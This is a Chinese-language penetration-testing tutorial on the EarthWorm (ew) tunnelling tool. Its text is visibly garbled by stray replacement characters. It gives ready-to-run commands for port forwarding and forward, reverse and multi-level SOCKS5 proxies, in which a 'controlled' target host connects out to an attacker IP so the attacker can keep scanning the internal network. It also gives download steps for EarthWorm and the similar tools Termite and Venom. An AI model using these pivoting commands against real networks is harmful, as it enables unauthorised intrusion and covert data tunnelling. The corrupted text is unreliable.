一句話說明:復(fù)雜內(nèi)網(wǎng)下��,數(shù)據(jù)轉(zhuǎn)發(fā)�����,轉(zhuǎn)出轉(zhuǎn)入工具�����;常用于socks5代理�,深度掃描內(nèi)網(wǎng)��;
官方:EarthWorm是一款用于開啟 SOCKS v5 代理服務(wù)的工具���,基于標(biāo)準 C 開發(fā)����,可提供多平臺間的轉(zhuǎn)接通訊���,用于復(fù)雜網(wǎng)絡(luò)環(huán)境下的數(shù)據(jù)轉(zhuǎn)發(fā)���。
零、前言
本文是在學(xué)習(xí)了下面參考文章的基礎(chǔ)上�����,基于自己的理解和心得補充了數(shù)據(jù)流量拓撲圖,這樣更好理解工具的使用場景和記住命令��;本文僅作為技術(shù)交流���。
一��、要點先說
1���、ew 自身的各個選項用途說明
-l 指定要監(jiān)聽的本地端口
-d 指定要反彈到的機器ip
-e 指定要反彈到的機器端口
-f 指定要主動連接的機器ip
-g 指定要主動連接的機器端口
-t 指定超時時長,默認為1000
2、正向代理和反向代理用途的區(qū)別
正向代理的典型用途是為在防火墻內(nèi)的局域網(wǎng)客戶端提供訪問Internet的途徑�。
反向代理的典型用途是將防火墻后面的服務(wù)器提供給Internet用戶訪問。
3����、rssocks 啟動的socks5服務(wù),轉(zhuǎn)發(fā)到最后一步必須使用rcsocks接收
4��、工具下載地址
http://rootkiter.com/EarthWorm/supportlist/
| Program Name | Describe | Eg |
|---|
| ew_for_Win.exe | 附件:ew.zip |
|
| 適用各種Windows系統(tǒng)(X86指令集�、X64指令集) | Windows7、Windows XP |
|
| ew_for_Linux32 | 各常見Linux發(fā)行版 |
|
| (X86 指令集 CPU) | Ubuntu(X86)/BT5(X86) |
|
| ew_for_linux64 | 各常見Linux發(fā)行版 |
|
| (X64 指令集 CPU) | Ubuntu(X64)/Kali(X64) |
|
| ew_for_MacOSX64 |
|
|
| MacOS系統(tǒng)發(fā)行版 (X64 指令集) | 蘋果PC電腦����,蘋果server |
|
| ew_for_Arm32 | 常見Arm-Linux系統(tǒng) |
|
| HTC New One(Arm-Android)/小米路由器(R1D) |
|
|
| ew_mipsel | 常見Mips-Linux系統(tǒng) |
|
| (Mipsel指令集 CPU) | 螢石硬盤錄像機、小米mini路由器(R1CM) |
|
二�、端口轉(zhuǎn)發(fā)功能
場景一
在攻擊機運行工具���,主動連接靶機3389端口,并將靶機的3389映射到攻擊機本地1080端口��;達到在攻擊機側(cè)訪問本地1080端口�����,將數(shù)據(jù)轉(zhuǎn)發(fā)到靶機3389��;
./ew -s lcx_tran -l 1080 -f 114.114.114.114 -g 3389
場景二
攻擊機側(cè)運行工具�����,做1080端口轉(zhuǎn)發(fā)本地8080端口���,且8080端口接受外部連接;靶機將本地3389端口數(shù)據(jù)轉(zhuǎn)發(fā)到攻擊機8080端口����;
最終形成一條由靶機主動外聯(lián)攻擊機,并在靶機與攻擊機形成一條數(shù)據(jù)轉(zhuǎn)發(fā)通道:攻擊機1080<--------->3389靶機
第一步在本地電腦創(chuàng)建監(jiān)聽端口8080�,防火墻和路由器需要開放本電腦此端口8080的訪問權(quán)限:
./ew -s lcx_listen -l 1080 -e 8080
第二步在遠端受控電腦上創(chuàng)建到本地電腦IP-114.114.114.114及端口8080的連接,以及提供訪問的其他電腦IP-10.0.0.1及端口3389(不一定要是此遠端電腦��,可以是此遠端電腦能夠訪問到的其他電腦IP和端口):
./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.1 -g 3389
三、socks5代理功能
場景一(正向代理)
在靶機側(cè)運行工具監(jiān)聽1080端口對外提供socks5代理服務(wù)��;在攻擊機側(cè)使用代理工具(例如:proxychains)連接靶機提供的socks5代理服務(wù)�,繼續(xù)滲透掃描內(nèi)網(wǎng)。
./ew -s ssocksd -l 1080
場景二(反向代理)
靶機側(cè)運行工具�����,本地啟動socks5服務(wù)�,主動外聯(lián)攻擊機8080端口,攻擊機側(cè)運行工具�,將對外訪問的8080端口與到本地1080端口做映射,進行數(shù)據(jù)轉(zhuǎn)發(fā)����;
第一步在本地電腦創(chuàng)建監(jiān)聽端口8080,防火墻和路由器需要開放本電腦此端口8080的訪問權(quán)限:
./ew -s rcsocks -l 1080 -e 8080
第二步在遠端受控電腦上創(chuàng)建到本地電腦IP-114.114.114.114及端口8080的連接:
./ew -s rssocks -d 114.114.114.114 -e 8080
場景三(正向代理):
靶機側(cè)運行工具啟動socks5服務(wù)���,邊緣機側(cè)運行工具將本地從1080端口收到的數(shù)據(jù)全部轉(zhuǎn)發(fā)到靶機1086端口����,在攻擊機側(cè)使用代理工具(例如:proxychains)連接邊緣機提供的1080端口�����;最終達到攻擊機側(cè)與靶機之間形成socks5代理通道,繼續(xù)滲透掃描內(nèi)網(wǎng)�����。
第一步在遠端靶機10.0.0.2上創(chuàng)建監(jiān)聽端口1086:
./ew -s ssocksd -l 1086
第二步在遠端邊緣機上創(chuàng)建創(chuàng)建端口1080到靶機10.0.0.2端口1086的轉(zhuǎn)發(fā)�����,防火墻和路由器需要開放遠端邊緣機端口1080的訪問權(quán)限:
./ew -s lcx_tran -l 1080 -f 10.0.0.2 -g 1086
場景四(反向代理):
靶機側(cè)運行工具啟動socks5服務(wù)��,邊緣機側(cè)運行工具連接靶機1086端口并主動外聯(lián)攻擊機8080端口����;攻擊機側(cè)運行工具�,對外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口����;最終實現(xiàn)在攻擊機側(cè)1080端口<—>靶機之間形成一條代理通道;
第一步在遠端靶機創(chuàng)建監(jiān)聽端口1086:
./ew -s ssocksd -l 1086
第二步在本地電腦上創(chuàng)建監(jiān)聽端口8080:
./ew -s lcx_listen -l 1080 -e 8080
第三步在遠端邊緣機創(chuàng)建到本地電腦的連接:
./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 1086
場景五(反向代理)-復(fù)雜型多級聯(lián)接
靶機側(cè)運行工具本地啟動socks5服務(wù)并反向連接中間機7777端口�����;中間機側(cè)運行工具將9999端口與7777端口數(shù)據(jù)轉(zhuǎn)發(fā)互通;邊緣機側(cè)運行工具�,通過主動外聯(lián)攻擊機8080端口將數(shù)據(jù)轉(zhuǎn)發(fā)到中間機9999端口;攻擊機側(cè)運行工具����,對外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口�;最終實現(xiàn)在攻擊機側(cè)1080端口<—>靶機之間形成一條代理通道;
第一步:
./ew -s lcx_listen -l 9999 -e 7777
第二步:
./ew -s rssocks -d 10.0.1.2 -e 7777
第三步:
./ew -s rcsocks -l 1080 -e 8080
第四步:
./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 9999
四��、最后說點什么
1����、耐下心來
剛開始看到這個工具本想一看而過,后來耐心的學(xué)習(xí)一下�����,打開了新世界���。
2��、動手實踐
看了很多文章也包括官方的文檔���;發(fā)現(xiàn)對小白來說想了解工具功能和不同場景,單看文字不直觀,沒有網(wǎng)絡(luò)拓撲很難理解��。所以本著自己邊學(xué)習(xí)邊記錄邊分享的精神��,整理了這篇文章�。
3、橫向比較
3.1 還發(fā)現(xiàn)了這個作者的另一個好用的工具Termite�����;目前EW和Termite作者已經(jīng)不維護了�,工具下載方式如下:
#git clone https://github.com/rootkiter/Binary-files.git
#cd Binary-files
#git checkout bd32230
HEAD 目前位于 bd32230 fix ew version
#ls
EarthWorm README.md Termite
其中Termite文件夾下面就是工具;
3.2 然后我在學(xué)習(xí)Termite的過程中又找到了一個和Termite功能基本一致的工具Venom(地址:https://github.com/Dliv3/Venom)���,我可以說這兩個工具對我來說可以算是“神器”了��!因為本篇重點是介紹EW的使用方法���,后面再根據(jù)情況����,也記錄一下這兩個“神器”工具的使用;
感興趣的小伙伴可以學(xué)習(xí)一下Termite/Venom���,玩起來挺爽����。
參考文章:
1、項目主頁
http://rootkiter.com/EarthWorm/(附件:EarthWorm-master.zip)
2��、內(nèi)網(wǎng)穿透的n種姿勢
https://xz.aliyun.com/t/9454?accounttraceid=69827aec0fbd4da68045e255cee9fd32xlwo
3�����、EW使用
https://blog.csdn.net/ws13129/article/details/94445378
4��、內(nèi)網(wǎng)滲透入門到放棄之必備殺器
https://www.shangyouw.cn/win7/arc36509.html
5���、Termite官方介紹說明
http://rootkiter.com/Termite/
http://rootkiter.com/Termite/README.txt
https://github.com/rootkiter/Termite
6��、Venom官方介紹說明
https://github.com/Dliv3/Venom
該文章在 2023/10/21 16:58:18 編輯過
400 186 1886
